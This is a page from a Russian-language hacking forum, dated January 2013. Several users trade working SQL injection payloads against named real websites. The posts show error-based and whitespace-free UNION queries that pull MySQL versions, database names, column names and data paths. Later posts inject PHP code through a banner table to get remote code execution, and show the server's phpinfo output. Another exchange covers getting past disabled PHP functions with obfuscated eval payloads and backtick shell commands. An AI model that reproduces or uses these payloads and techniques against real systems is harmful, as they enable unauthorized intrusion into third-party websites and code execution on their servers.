Старый 08.01.2013, 15:48   #2611
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

you cant,since in name_const you can execute only the version,if the version is not between 5.0.12 - 5.0.41
string&whitespace-
Код:
http://www.albummusic.net/rus/clips'*(select*from(select(name_const(version(),1)),name_const(version(),1))a)*'
Duplicate column name '5.0.95'
Код:
http://www.1md.ru/catalog/list/250'*(select*from(select(name_const(version(),1)),name_const(version(),1))a)*'
Duplicate column name '5.0.90'
you can also find the db name,using error based-
Код:
http://www.1md.ru/catalog/list/250'*v()*'
FUNCTION mdru_db.v does not exist
spari вне форума   Ответить с цитированием
Старый 08.01.2013, 17:45   #2612
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

spari, я уже писал про name_const и невозможность раскрутки в ней, будьте внимательнее.
netcat вне форума   Ответить с цитированием
Старый 08.01.2013, 17:57   #2613
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от netcat Посмотреть сообщение
spari, я уже писал про name_const и невозможность раскрутки в ней, будьте внимательнее.
sorry man,didnt noticed that.
spari вне форума   Ответить с цитированием
Старый 08.01.2013, 20:31   #2614
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

Цитата:
Сообщение от Flakt Посмотреть сообщение
Работает, только не пойму как сейчас таблицы через limit перебирать?

GET /catalog/list/2501'and(1)=(select*from(select*from(information_s chema.tables`a`)JOIN(information_schema.tables`b`) using(TABLE_CATALOG,TABLE_SCHEMA))c)='1 HTTP/1.1
Host: www.1md.ru

Duplicate column name 'TABLE_NAME'
этот метод для определения имен колонок таблицы, а не для получения данных из таблиц.


Цитата:
Сообщение от netcat Посмотреть сообщение
Ещё одна SQL:
http://www.1md.ru/catalog/list/250'/
Тоже самое, вывод удаётся получить только через name_const который непригоден для взлома.
А составить запрос через floor rand без использования пробелов у меня так и не получилось, в данном случае урленкодируется комбинация /**/, а без неё вроде как нельзя через floor rand крутить, или я просто не могу запрос составить.
Буду очень благодарен за помощь.
параметр xxx из /catalog/list/xxx попадает, как минимум, в 2 запроса - один, что ты нашел, только errorbased, который без пробелов обычно нормально крутится через ExtractValue, поддержки которого нет в mysql на этом серваке.

а вторая 'детская' инъекция, которую почему-то (автоматизм наверное) никто не заметил, здесь:
GET /catalog/list/(251-1)and(1=0)union(select(1),(select(@@datadir)),3,4, 5,7) HTTP/1.1
=>
<title>/var/db/mysql/ </title>

кста, там еще раскрытие пути есть:
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/aum/data/www/1md.ru/catalog/ob_form.php on line 288
DrakonHaSh вне форума   Ответить с цитированием
Старый 08.01.2013, 23:52   #2615
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

very nice
you can also close the title tag and get the output the the screen-
Код:
http://www.1md.ru/catalog/list/(251-1)and(1=2)union(select(1),concat(0x3c2f7469746c653e3c68313e,version(),0x3c2f68313e),3,4,5,7)
spari вне форума   Ответить с цитированием
Старый 09.01.2013, 15:41   #2616
beastie
 
Регистрация: 31.12.2012
Сообщений: 4
Репутация: 0
По умолчанию

Ситуация следующая, есть возможность редактировать шаблоны. Пхп код вставляется вот так {~phpinfo()~}.
Побывал eval,assert,system и т.д., даже так
PHP код:
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'K8goyMxLy9fQtLa3AwA='\x29\x29\x29\x3B","."
Пишет фун-ия disabled. Фильтрует какой-то скрипт, исходники глянуть нет возможности. В php.ini данные ф-ии on 100%. Есть идеи как можно впихнуть примитивный пхп код?
beastie вне форума   Ответить с цитированием
Старый 09.01.2013, 15:59   #2617
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

{~`ls -la`~}
через каллбеки других ф-ций + всякие strrev+base64
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 09.01.2013, 17:18   #2618
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

вчера, пока изучал http://www.1md.ru/catalog/list/250'/
нашел имена колонок беспробельным методом от v1d0q (сам метод ("пробельный") вроде от Qwazar),
Код:
запрос для последней колонки:
GET /catalog/list/2501'and(1)=(select*from(select*from(fho_banners`a`)JOIN(fho_banners`b`)using(id,idfirm,iduser,bancat,bannersarea,banformat,startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,php_code,js_name,js_opis,js_code,url))c)='1 HTTP/1.1
=> graph_down
=>
id,idfirm,iduser,bancat,bannersarea,banformat,startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,php_code,js_name,js_opis,js_code,url,graph_down
учитывая, что имя колонки php_code очень многообещающе сегодня решил добить:

Код:
GET /catalog/list/(251-1)and(1=0)union(select(1),(select(group_concat(banformat))from(fho_banners)),3,4,5,7) HTTP/1.1
=> {graph,flash}
логично предполагая что при banformat='php' должен вызывать php, пробую:

Код:
GET /catalog/list/250'and(0)union(select(id),idfirm,iduser,bancat,bannersarea,'php',startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,'phpinfo();',js_name,js_opis,js_code,url,(graph_down)from(fho_banners)where(id)=19811)# HTTP/1.1
=>
phpinfo

Последний раз редактировалось DrakonHaSh; 09.01.2013 в 17:26..
DrakonHaSh вне форума   Ответить с цитированием
Старый 09.01.2013, 17:53   #2619
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от DrakonHaSh Посмотреть сообщение
вчера, пока изучал http://www.1md.ru/catalog/list/250'/
нашел имена колонок беспробельным методом от v1d0q (сам метод ("пробельный") вроде от Qwazar),
Код:
запрос для последней колонки:
GET /catalog/list/2501'and(1)=(select*from(select*from(fho_banners`a`)JOIN(fho_banners`b`)using(id,idfirm,iduser,bancat,bannersarea,banformat,startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,php_code,js_name,js_opis,js_code,url))c)='1 HTTP/1.1
=> graph_down
=>
id,idfirm,iduser,bancat,bannersarea,banformat,startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,php_code,js_name,js_opis,js_code,url,graph_down
учитывая, что имя колонки php_code очень многообещающе сегодня решил добить:

Код:
GET /catalog/list/(251-1)and(1=0)union(select(1),(select(group_concat(banformat))from(fho_banners)),3,4,5,7) HTTP/1.1
=> {graph,flash}
логично предполагая что при banformat='php' должен вызывать php, пробую:

Код:
GET /catalog/list/250'and(0)union(select(id),idfirm,iduser,bancat,bannersarea,'php',startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,'phpinfo();',js_name,js_opis,js_code,url,(graph_down)from(fho_banners)where(id)=19811)# HTTP/1.1
=>
phpinfo
Что-то не могу вывести phpinfo() твоим способам, хотя остальное все выводится

PHP код:
GET /catalog/list/250'and(0)union(select(id),idfirm,iduser,bancat,bannersarea,'php',startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,'phpinfo();',js_name,js_opis,js_code,url,(graph_down)from(fho_banners)where(id)=19811)# HTTP/1.1
Host: www.1md.ru
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3 
Flakt вне форума   Ответить с цитированием
Старый 09.01.2013, 18:35   #2620
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

Цитата:
Сообщение от Flakt Посмотреть сообщение
Что-то не могу вывести phpinfo() твоим способам, хотя остальное все выводится
возможно дело в "кривом" способе редактирования запроса (расширение к браузеру или еще какая нибудь кривоватая хрень).

burp free 1.5 , Repeater
Код:
GET /catalog/list/250'and(0)union(select(id),idfirm,iduser,bancat,bannersarea,'php',startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,'phpinfo();',js_name,js_opis,js_code,url,(graph_down)from(fho_banners)where(id)=19811)# HTTP/1.1
Host: www.1md.ru


=>
PHP Version 5.3.2
FreeBSD aut.su 8.0-STABLE-201004 FreeBSD 8.0-STABLE-201004 #0: Mon Apr  5 15:59:06 UTC 2010     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
DrakonHaSh вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot